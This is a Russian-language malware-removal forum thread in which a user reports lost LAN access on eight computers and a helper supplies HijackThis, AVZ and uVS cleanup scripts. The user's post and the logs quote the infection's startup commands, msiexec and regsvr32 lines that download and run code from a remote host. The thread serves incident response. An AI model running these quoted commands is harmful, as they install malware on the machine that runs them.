Нет сети, но интернет есть через тот же кабель

**Волокитин** · 29.05.2017, 13:23

Это моя вторая сеть в которой появилась эта проблема, до этого была аналогичная проблема в другой сети с 4 компьютерами. В той сети проблема решалась через ваш сайт, и наполовину все заработало (настройки еще не сбрасывал с помощью Windows Repair). ссылка на предыдущую тему https://virusinfo.info/showthread.php?t=212346.

Вот описание проблемы:
Пропала сеть на 8 компьютерах, но интернет по этому же кабелю раздается нормально.
Проверка настроек ни к чему не привела, сети так и нет. С одного раздающего интернет компьютера видно все компы, но другие его не видят. пинг нормальный без потерь во все стороны.
В автозагрузке появились пункты "msiexec.exe /i http://js.mykings.top:280/helloworld.msi/q" и "regsvr32 /u/s/i:http://js.mykings.top:280/v.sct scrobj.dll", отключение не помогло.
Еще появился файл hosts.ics, удаление его не помогает, после перезагрузки он снова появляется.
Настройки сети переправлялись, но безрезультатно.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 29.05.2017, 13:24

Уважаемый(ая) Волокитин, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 29.05.2017, 21:45

Выполните скрипт в AVZ:Компьютер перезагрузится.

Перетащите лог Check_Browsers_LNK.log из папки Autologger на утилиту ClearLNK. Отчёт о работе прикрепите.

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/search?q={SearchTerms}&fr=iextn
R4 - HKCU\Software\Policies\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/search?q={SearchTerms}&fr=ntg&gp=blackbear16
O4 - MSConfig\startupreg: [Acrobat Assistant 8.0] C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrotray.exe  (HKLM) (2017/01/30)
O4 - MSConfig\startupreg: [AdobeAAMUpdater-1.0] C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe  (HKLM) (2017/01/30)
O4 - MSConfig\startupreg: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner.exe /MONITOR (HKCU) (2016/02/25)
O4 - MSConfig\startupreg: [SDTray] C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe  (HKLM) (2017/01/30)
O4 - MSConfig\startupreg: [amigo] C:\Users\NATASHA\AppData\Local\Amigo\Application\amigo.exe --no-startup-window (file missing) (HKCU) (2015/09/04)
O4 - MSConfig\startupreg: [bwworvatml] C:\Windows\explorer.exe "http://portaldom.ru/?utm_source=uoua03&utm_content=9b05bbc0cd71352ee97e58aee9075b9f&utm_term=0A17BB017CC4D6EDA205E11E0DE465A8" (HKCU) (2015/09/04)
O4 - MSConfig\startupreg: [kometaup] C:\Users\NATASHA\AppData\Local\Kometa\kometaup.exe --windows-start (file missing) (HKCU) (2015/09/04)
O4 - MSConfig\startupreg: [msegui] C:\Program Files\Код Безопасности\Абонентский Пункт\mseGui.exe (file missing) (HKLM) (2016/05/11)
O4 - MSConfig\startupreg: [start1] msiexec.exe  /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/05/22)
O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/05/22)
O22 - Task (Ready): {45F41C00-C156-4F43-A24A-66A49B2FE3C6} - C:\Program Files\Opera\launcher.exe

Устраните уязвимости, которые привели к эпидемии WannaCry - ссылка в другой Вашей теме.

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

**Волокитин** · 30.05.2017, 13:30

Вы пишете:

"Выполните скрипт в AVZ:Компьютер перезагрузится.
Перетащите лог Check_Browsers_LNK.log из папки Autologger на утилиту ClearLNK. Отчёт о работе прикрепите."

а какой скрипт для AVZ? его нет в сообщении.
Пожалуйста, пришлите скрипт!

- - - - -Добавлено - - - - -

Т.к. нет первого скрипта для avz, то ClearLNK не запускал и начал сразу с HijackThis, установил обновление KB 04012212. Вот логи от второго скрипта avz и uvs

**Vvvyg** · 30.05.2017, 19:41

Не страшно, всё дочистим в UVS.
Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):

Код:

;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
winsockreset
deltmp
;---------command-block---------
delref %SystemDrive%\PROGRAM FILES\03000200-1441348352-0500-0006-000700080009\HNSBDB82.TMP
delref %SystemDrive%\PROGRAM FILES\03000200-1441348352-0500-0006-000700080009\JNSB5792.TMP
delref %SystemDrive%\PROGRAM FILES\03000200-1441348352-0500-0006-000700080009\KNSQ1407.TMPFS
delref %SystemRoot%\FONTS\SPPSRV.EXE
delref D:\IQIYI VIDEO\LSTYLE\WINIO.SYS
delref %SystemDrive%\PROGRAM FILES\IOBIT\DRIVER BOOSTER\DRIVERBOOSTER.EXE
delref %SystemDrive%\PROGRAM FILES\IOBIT\IOBIT UNINSTALLER\IOBITUNINSTALER.EXE
delref S&AMP;A.EXE
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
delref %SystemDrive%\USERS\NATASHA\APPDATA\LOCAL\YANDEX\BROWSERMANAGER\BROWSERMANAGERSHOW.EXE
delref %SystemDrive%\USERS\NATASHA\APPDATA\LOCAL\AMIGO\APPLICATION\OK.EXE
delref %SystemDrive%\USERS\NATASHA\APPDATA\LOCAL\AMIGO\APPLICATION\VK.EXE
delref D:\IQIYI VIDEO\LSTYLE\NPWEBPLAYER.DLL
delref %SystemDrive%\PROGRAM FILES\TRACKER SOFTWARE\UPDATE\TRACKERUPDATE.EXE
delref %SystemDrive%\PROGRAM FILES\VIDEO SAVER 2\IEEF\_QZUQLVSKF.EXE
del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\TOTAL COMMANDER\ПОЛЕЗНЫЕ УТИЛИТЫ\ПОКАЗ ЗВЕЗД-ПАРОЛЕЙ.LNK
del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\TOTAL COMMANDER\УДАЛЕНИЕ СБОРКИ TC.LNK
delref %SystemDrive%\USERS\NATASHA\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\NMMHKKEGCCAGDLDGIIMEDPICCMGMIEDA\0.1.2.0_0\ПЛАТЕЖНАЯ СИСТЕМА ИНТЕРНЕТ-МАГАЗИНА CHROME
apply

restart

Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Сообщите, что с проблемой.

**Волокитин** · 31.05.2017, 13:45

ничего не поменялось!
В другой теме запрашивали карантин, и потом через FRST, может и здесь также сделать?

- - - - -Добавлено - - - - -

А если попробовать windows repair, может быть поможет?

**Vvvyg** · 31.05.2017, 18:39

Пока не нужно, выполните сперва такой скрипт в UVS:

Код:

;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
regt 25
regt 27
apply
restart

После перезагрузки проверяйте сеть.

**Волокитин** · 01.06.2017, 15:01

Ура, принтер стал печатать по сети! Спасибо!
В сетевом окружении теперь также, как и в предыдущей теме, в сетевом окружении не видны компьютеры, но если вводить адрес вручную в проводнике, то все открывается.
Теперь попробовать windows repair?
И что это все таки за вирус? И появился только на компах с которых раздается сеть. Если бы был роутер, то такой ерунды я думаю не произошло бы, но увы все завязано на один компьютер.

- - - - -Добавлено - - - - -

А есть ли универсальный вариант проверки всех компьютеров этой сети на поиск этого вируса на других компьютерах сети? в целях профилактики.
Везде стоит dr web ss 11, но он ничего, кроме ammy admina и Teamviewera не находит. Вроде все нормально, но вдруг!?

**Vvvyg** · 01.06.2017, 21:06

Попробуйте такой скрипт в UVS:

Код:

;uVS v4.0.5 [http://dsrt.dyndns.org]
v400c
delall %SystemRoot%\FONTS\SPPSRV.EXE
delref %SystemDrive%\PROGRAMDATA\ALTERGEO\UPDATE FOR HTML5 GEOLOCATION PROVIDER\NPHTML5LOC.DLL
delref %SystemRoot%\DEBUG\ITEM.DAT
delref S.DAT
delref S&AMP;A.EXE
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
regt 25
deltmp
apply
restart

Лишнего точно не удалит, но гарантии, что все варманты зачистит дать не могу. И без установки патча от MS бесполезен.

Нет сети, но интернет есть через тот же кабель (заявка № 212551)

Опции темы